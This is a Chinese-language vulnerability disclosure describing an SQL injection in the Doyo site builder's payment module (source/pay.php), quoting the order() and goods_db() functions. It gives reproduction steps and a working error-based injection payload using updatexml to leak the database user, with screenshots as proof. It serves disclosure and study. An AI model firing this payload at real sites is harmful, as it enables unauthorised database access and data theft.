doyo建站sql注入

### 简要描述： rt ### 详细说明： 看到\source\pay.php ``` function order(){ if($this->syArgs('oid')||$this->syArgs('orderid',1)!=''){ if($this->syArgs('oid')){$r=array('id'=>$this->syArgs('oid',1));}else{$r=array('orderid'=>$this->syArgs('orderid',1));} $order=$this->c->find($r); if($order['state']!=0){jump('?c=member&a=myorder&oid='.$order['id']);} $this->goods=$this->goods_db(unserialize($order['goods']),$order['logistics']); }else{ if($GLOBALS['G_DY']['vercode']==1){ if(!$this->syArgs("vercode",1)||md5(strtolower($this->syArgs("vercode",1)))!=$_SESSION['doyo_verify'])message("验证码错误"); } $this->cart=$this->syArgs('cart'); $virtual=$this->syArgs('virtual'); if(!$this->id&&!$this->cart)message("请指定购买内容"); $info=$this->syArgs('info',2); if($virtual!=1&&($info['name']==''||$info['phone']==''||$info['address1']==''||$info['address2']==''||$info['address']==''))message("姓名、手机、省、市、地址为必填"); if($this->cart){ syDB('goodscart')->delete(array('uid'=>$this->my['id'])); } $this->goods=$this->syArgs('goods',2); if($virtual!=1){ $o=$this->order_add($this->goods,0,$this->syArgs('logistics',1),$info,$this->syArgs('unote',1)); jump($GLOBALS['WWW'].'index.php?c=pay&a=order&oid='.$o); }else{ $payment=$this->syArgs('payment',1); if(!$payment)message("请指定支付平台"); $vi=total_page($this->db.'product_virtual where aid='.$this->goods[0]['aid'].' and state=0'); if($vi<$this->goods[0]['quantity'])message("库存不足，暂无法购买，请联系客服。",'?c=pay&id='.$this->goods[0]['aid']); $o=$this->order_add($this->goods,1,$this->syArgs('logistics',1),$info,$this->syArgs('unote',1)); jump($GLOBALS['WWW'].'index.php?c=pay&a=pay&payment='.$payment.'&id='.$o); } } $order['info']=unserialize($order['info']); $this->goods=$this->goods_db(unserialize($order['goods']),$order['logistics']); $this->total=0; foreach($this->goods as $v){ $this->total=calculate($this->total,$v['total']); $this->total=calculate($this->total,$v['logistics_price']); } $this->aggregate=calculate($this->total, $order['favorable'],2); $this->order=$order; $this->positions='<a href="'.$GLOBALS["WWW"].'">首页</a> &gt; 支付中心'; $this->display("pay/buy.html"); } ``` 跟进goods_db ``` private function goods_db($ids,$logistics){ if(!is_array($ids)){ $va=$this->m->find(array('id'=>$this->id,'isshow'=>1),null,'title,tid,price'); if($va){ $goods[0]['aid']=$this->id; $goods[0]['attribute']=$this->syArgs('attribute',2); $goods[0]['quantity']=$this->syArgs('quantity',0,1); $goods[0]['title']=$va['title']; $goods[0]['tid']=$va['tid']; $attribute_db=$this->attribute_db($goods[0]['attribute'],$this->id,$va['price']); $goods[0]['attribute_txt']=$attribute_db['txt']; $priceva=$attribute_db['price']; $discount=syDB('product_discount')->find(array('aid'=>$this->id,'mgid'=>$this->my['group']['gid'])); if($discount&&$discount['type']!=0){ $goods[0]['discount'][0]=$attribute_db['price']; if($discount['type']==1&&$discount['discount']>0&&$discount['discount']<10){ $priceva=round($attribute_db['price']*($discount['discount']/10), 2); $goods[0]['discount'][1]=rtrim(rtrim($discount['discount'],'0'),'.0').'折'; } if($discount['type']==2&&$discount['discount']>0&&$discount['discount']<$attribute_db['price']){ $priceva=$attribute_db['price']-$discount['discount']; $goods[0]['discount'][1]='直减'.$discount['discount'].'元'; } } $goods[0]['price']=$priceva; $goods[0]['total']=$priceva*$goods[0]['quantity']; } }else{ $goods=array(); foreach($ids as $k=>$v){ $va=$this->m->find(array('id'=>$v['aid'],'isshow'=>1),null,'title,tid,price,logistics'); if($va){ $goods[$k]['cartid']=$v['cartid']; $goods[$k]['aid']=$v['aid']; $goods[$k]['attribute']=$v['attribute']; $goods[$k]['quantity']=$v['quantity']; $goods[$k]['title']=$va['title']; $goods[$k]['tid']=$va['tid']; $logistics_price=unserialize($va['logistics']); $goods[$k]['logistics_price']=$logistics_price[$logistics]*$v['quantity']; $attribute_db=$this->attribute_db($v['attribute'],$v['aid'],$va['price']); $goods[$k]['attribute_txt']=$attribute_db['txt']; $priceva=$attribute_db['price']; $discount=syDB('product_discount')->find(array('aid'=>$v['aid'],'mgid'=>$this->my['group']['gid'])); if($discount&&$discount['type']!=0){ $goods[$k]['discount'][0]=$attribute_db['price']; if($discount['type']==1&&$discount['discount']>0&&$discount['discount']<10){ $priceva=round($attribute_db['price']*($discount['discount']/10), 2); $goods[$k]['discount'][1]=rtrim(rtrim($discount['discount'],'0'),'.0').'折'; } if($discount['type']==2&&$discount['discount']>0&&$discount['discount']<$attribute_db['price']){ $priceva=$attribute_db['price']-$discount['discount']; $goods[$k]['discount'][1]='直减'.$discount['discount'].'元'; } } $goods[$k]['price']=$priceva; $goods[$k]['total']=$priceva*$v['quantity']; } } } return $goods; } ``` 代码作用就是将good数组里面的内容反序列化然后插入数据库。 首先注册一个用户，任意选择一个商品下单。 然后构造 ``` goods%5B0%5D%5Baid%5D=17&goods%5B0%5D%5Bquantityo%5D=1"'or updatexml(1,concat(0x7c,user()),0) or '&payment=offline&vercode=uv2f ``` 可以看到数据已经出来了。 [<img src="https://images.seebug.org/upload/201503/1910172521f6173d740d5d3f2f25679982ff2508.png" alt="13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1910172521f6173d740d5d3f2f25679982ff2508.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201503/1910172521f6173d740d5d3f2f25679982ff2508.png" alt="13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201503/1910172521f6173d740d5d3f2f25679982ff2508.png)